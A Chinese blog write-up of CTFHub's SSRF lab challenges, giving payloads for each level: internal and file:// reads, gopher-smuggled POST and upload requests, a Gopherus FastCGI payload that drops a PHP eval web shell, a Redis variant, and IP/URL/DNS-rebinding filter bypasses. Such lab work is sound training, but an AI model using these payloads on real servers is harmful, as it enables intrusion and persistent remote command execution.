CTFHub之web之ssrf

已于 2024-07-24 20:32:05 修改
阅读量320 收藏 5
点赞数 5
分类专栏: ctfhub靶场 文章标签: csrf
于 2024-07-24 14:30:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ineedmoreMuQ/article/details/140661404
版权

2024/7/24

我们来做一做CTFHub之web之ssrf的靶场攻略

我们来到第一题,内网访问

根据题意,网文内网的文件我们使用http://127.0.0.1/flag.php来直接访问存在ssrf漏洞的靶场

即可获得flag,十分简单,考了什么是ssrf漏洞,如何使用漏洞访问内网ip

我们来到第二题

伪协议读取文件

尝试读取web目录下的文件也就是使用file协议来读取文件

file:///flag.php

结果不对显然是文件目录不对

上网查了一下linux网站默认目录 ,Apache默认网站目录是在/var/www/html

那么我们访问

file:///var/www/html/flag.php

网站会以我们???打开源代码

flag找到了

我们来到第三关

端口扫描

显然扫描端口我们需要工具以及dict协议

dict://127.0.0.1:8000

开启万能的burpsuit

貌似把靶场打崩了,没找到flag

找到了把dict改成http即可

来做第四题

post请求,那么肯定要抓包的

第一步,和前面的题一样先访问http://127.0.0.1/flag.php并F12查看源代码

将代码中的key复制到框中

抓一个包

提示

显然这是302重定向问题,现在处理一下,重抓包然后把包中和重定向相关的都删了

只留下host和两个content

并保存个txt

解决重定向问题改host为

Host: 127.0.0.1:80

加码url编码两次

加码的时候一定要选一个能把空格加码成%20而不是+的加码工具

这点很重要!

第一次

POST%20/flag.php%20HTTP/1.1%0AHost%3A%20127.0.0.1%3A80%0AContent-Length%3A%2036%0AContent-Type%3A%20application/x-www-form-urlencoded%0A%0Akey%3D638bf3fd51a6f68cba2b1fd7dff24140

将编码结果%0A全部替换为%0D%0A并在最后加入%0D%0A

在将结果进行第二次url编码

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253D638bf3fd51a6f68cba2b1fd7dff24140%250D%250A

在url处填写gopher协议让其用我们抓的包跳转到当前页面

gopher://127.0.0.1:80/_

http://challenge-0ba44c0499ad85b8.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253D638bf3fd51a6f68cba2b1fd7dff24140%250D%250A

就找到flag了

第五关

上传文件

打开环境

老规矩先访问flag.php

选择文件上传

发现这个不安好心提交不给提交按钮,无法我们只能自己写一个

F12打开源代码手搓一个

<input type="submit" name="submit">

然后上传一个文件,接着抓一个包

和第四关一样的操作重复一下

删掉多余的

把乱码的框都删了加上相应数量的文字在reperter里看

length长度在重放器里看,要一致

两次url加码

第一次改%0A->%0D%0A最后加%0A

然后gopher://127.0.0.1:80/_提交

ctfhub{36b722c829a7eecd09d50e00}

第六关

FastCGI协议

步骤一:准备一句话木马并构造要执行的终端命令:对一句话木马进行base64编码且写入到名为shell.php的文件中。

<?php @eval($_POST['cmd']);?>

把这段话经过base64编码后为

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

打开kali输入

echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" |  base64 -d > shell.php

把这段话64解码重定向到shell.php中这样我们的一句话木马准备完毕

步骤二:使用Gopherus工具生成payload:

安装软件

git clone https://github.com/tarunkant/Gopherus.git

python2 gopherus.py --exploit fastcgi

并输入网址目录和木马语句生成攻击载荷

将生成的载荷二次url编码后访问即可

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%02%02%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH125%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%14SCRIPT_FILENAME/vaww/html/index.php%0D%01DOCUMENT_ROOT/%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%7D%04%00%3C%3Fphp%20system%28%27echo%20%22PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4%3D%22%20%7C%C2%A0%20base64%20-d%20%3E%20shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

gopher%3A//127.0.0.1%3A9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2502%2502%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH125%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2514SCRIPT_FILENAME/vaww/html/index.php%250D%2501DOCUMENT_ROOT/%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%257D%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520%2522PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4%253D%2522%2520%257C%25C2%25A0%2520base64%2520-d%2520%253E%2520shell.php%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500%0A

访问后会在网站同级目录生成shell.php

打开菜刀一个为目录另外一个为木马的参数即可链接

可在根目录下找到flag

本体注意点,加码时不要有多余的空行以及网站同级目录的位置

第七关

这一关同上一题,用相同的软件相同的操作,漏洞改一下即可使用redis漏洞

复制链接去加码加码后攻击网站

http://challenge-f45846a55409a5d6.sandbox.ctfhub.com:10800/?url=_

去掉最后下划线并把代码粘贴网站会一直转圈,这是正常现象

然后根目录访问shell.php

http://challenge-f45846a55409a5d6.sandbox.ctfhub.com:10800/shell.php

为下图,然后使用菜刀

如何使用菜刀见上一课内容,在根目录即可找到flag

第八关

url必须包含http://notfound.ctfhub.com

这里我们使用@,A@B意味着A是B的用户我们使用

http://challenge-f73b300e18dff780.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

来访问即可获得flag

第九关

数字型把ip改为十六进制表示即可

127.0.0.1改为16进制为7F000001

点用0表示其他数字用十六进制转换即可0x可以让浏览器识别十六进制

访问即可获得flag

第十关

使用localhost代替127.0.0.1即可绕过302

第十一关

利用?url=http://7f000001.7f000002.rbndr.us/flag.php即可

http://challenge-82d57799f6110afa.sandbox.ctfhub.com:10800/?url=http://7f000001.7f000002.rbndr.us/flag.php

访问即可获得flag

ineedmoreMuQ
关注
专栏目录
CTFweb学习记录 -- SSRF
lifanxin的博客
06-29 1986
SSRF概述SSRF原理SSRF漏洞修复一道例题总结 概述   SSRF(Server-Side Request Forgery)服务器端请求伪造,是一种由攻击者构造请求,服务器端发起请求的安全漏洞。当然之所以要这样曲折,是因为SSRF的目标一般是外网无法访问的内部系统,所以需要用服务器端发送。 SSRF原理   SSRF形成的原因在于服务器端提供了从其它服务器应用获取数据的功能且没有对目标地址做过滤和限制。通过该漏洞我们可以攻击内网的服务器,获取相应的资源信息,利用file协议读取内部网络文件等。   如
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 2100
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
CTFHub web技能树 SSRF
qq_61768489的博客
02-23 1169
主要的几个协议 file协议: 在有回显的情况下,利用 file 协议可以读取任意文件的内容 http/s协议:探测内网主机存活 dict协议:泄露安装软件版本信息,查看端口,操作内网redis服务等 gopher协议:gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell 内网访问 /?url=127.0.0.1/flag.php 伪协议.
CTFHub -web-ssrf总结 (除去fastcgi和redis)超详细
m0_62879498的博客
02-11 2300
CTFHub -web-ssrf 练习总结 一,内网访问 尝试访问位于127.0.0.1的flag.php吧 所以我们可以直接构建url: /?url=http://127.0.0.1/flag.php 进行访问即可成功 二,为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们先尝试 ?url=http://127.0.0.1/flag.php 发现访问不见 这道题说白了是让我们访问本地计算机的web文件 所以我们使用 file 协议读取构造: /url=file:///var/ww
CTFHub_Web_SSRF_POST
阿刁〇的博客
08-08 1030
CTFHub_Web_SSRF_POST 首先,简单来了解一下SSRF SSRF(server-side request forgery,服务端请求伪造),是一种由攻击者构造形 成由服务器发起请求的一个漏洞。让服务器去请求通常请求不到的东西。 一般用来在外网探测或攻击内网服务。 SSRF漏洞形成的原因多事服务端提供了从外部服务获取数据的功能,但没有对目标地址、协议等重要参数进行过滤和限制,从而导致攻击者可以自由构造参数,而发起预期外的请求 漏洞成因 相关函数 file_get_conte
CTFHub_技能树_WebSSRF
Ho1aAs‘s Blog
03-25 536
文章目录前言一、知识点二、题解内网访问伪协议读取文件端口扫描FastCGI协议Redis协议URL Bypass数字IP Bypass302跳转 BypassDNS重绑定Bypass完 前言 POST请求、上传文件两道题目未解出 一、知识点 二、题解 内网访问 伪协议读取文件 端口扫描 FastCGI协议 Redis协议 URL Bypass 数字IP Bypass 302跳转 Bypass DNS重绑定Bypass 完 ...
CTFHUB-web-SSRF
ookami6497的博客
03-25 899
CTFHUB-web-ssrf
通过ctfhub实操学习ssrf
不想当脚本小子的脚本小子
03-21 681
实战中碰到的SSRF漏洞比较少,刚好在freebuf上看到了一位大佬写的ssrf系统性学习文章(https://www.freebuf.com/articles/web/258365.html)就跟着一起学习一下。 SSRF,服务端请求伪造;一般情况下,SSRF攻击的目标是外网无法连接的内部系统,比如说当我们发现一个web服务器存在ssrf时,而它又连接内网,我们就可以利用这个服务器对内网发出一些请求来获取一些敏感信息,而此时的web服务器就被当作成为跳板使用; SSRF形成的原因是由于服务端提.
CTFhub SSRF第一部分
qq_41497476的博客
09-16 834
1.内网访问 提示得很明显 就是要利用ssrf漏洞访问127.0.0.1主机内的flag.php. 在查阅资料的过程中还发现了其他的绕过写法,加上这些特殊符号后对结果无影响 2.伪协议读取文件 强调了Web目录,那明显就是要用到绝对路径,file协议是用绝对路径访问本地文件的协议。 Linux系统下,网站路径是 /var/www/html/… 利用该路径去获得flag文件 看一下对比 file协议是引入绝对路径,但不理解为什么用127.0.0.1直接包含的flag.php跟用file协议绝对路径包
CTFHub技能树_SSRF_Bypass
m0_54525483的博客
08-12 447
这是一个新手的做题笔记,记录一下做题的解法。 1.什么是SSRF? 很多web应用都提供了从其他服务器上获取数据的功能,根据用户指定的URL,WEB应用可以获取图片、下载文件、读取文件内容等。这种功能如果被恶意使用,将导致存在缺陷的Web应用被作为代理通道去攻击本地或远程服务器。这种形式的攻击被称为服务器端请求伪造攻击(Server-side-Request Forgery,SSRF)。 如何形成: SSRF形成的原因大都是由于服务器提供了从其他服务器或应用中获取数据的功能,但没有对目标地址做出有效
CTF web题总结--SSRF
热门推荐
bob的博客
08-29 1万+
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内网。(正因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网) SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制。即SSRF漏洞就是通过篡改 获取
CTFHub技能树web(持续更新)--SSRF--POST请求
jiuyongpinyin的博客
02-02 935
POST请求 这道题我没做出来,是参考了大佬的文档做得 点我查看大佬链接 有很多不解的地方,这里我就只提供我的payload把 url=gopher://127.0.0.1/_POST%252b/flag.php%252bHTTP/1.1 Host%25253a%252b127.0.0.1%25253a80 Content-Type%25253a%252bapplication/x-www-form-urlencoded Content-Length%25253a%252b36 Content-Leng
ctfshow web入门ssrf
xiaolong22333的博客
04-28 1043
其实刚接触时做过一遍,现在再做一遍巩固一下知识点 文章目录web351web352web353web354web355web356web357 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1.
CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 1209
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
CTF-WEB总结之SSRF利用
weixin_41038905的博客
05-01 2536
1、dirsearch目录扫描 看不到内容是由于php的<被当做一个注释。php的格式 <?php ... ?> 通过dict协议探测端口
Webctfhub基础知识之SSRF
A_Gaming的博客
01-04 1604
但是在整个过程中,第一次去请求DNS服务进行域名解析到第二次服务端去请求URL之间存在一个时间差,利用这个时间差,我们可以进行DNS 重绑定攻击,利用DNS Rebinding技术,在第一次校验IP的时候返回一个合法的IP,在真实发起请求的时候,返回我们真正想要访问的内网IP即可。要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。
Ctfhub解题 web SSRF(未完待续)
weixin_46703850的博客
03-21 1228
Ctfhub解题 web SSRF(未完待续)
ctf_show笔记篇(web入门---SSRF)
最新发布
whale_waves的博客
04-04 1114
ssrf产生原理: 服务端存在网络请求功能/函数,例如:file_get_contens()这一类类似于curl 这种函数传入的参数用户是可控的 没有对用户输入做过滤导致的ssrf漏洞 ssrf利用: 用于探测内网服务以及端口 探针存活主机以及开放服务 探针是否存在redis服务(未授权访问, 相当于是可以访问到redis服务并且开发人员不严谨没有设置密码, 因为默认是没有密码的, 或者说开发者设置了密码但是是弱口令), 利用定时任务反弹shell
CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结
Love&Share
09-28 6790
SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 相关函数和类 file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中 readfile():输出一个文件的内容 fsockopen():打开一个网络连接或者一个Unix 套接字连接
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值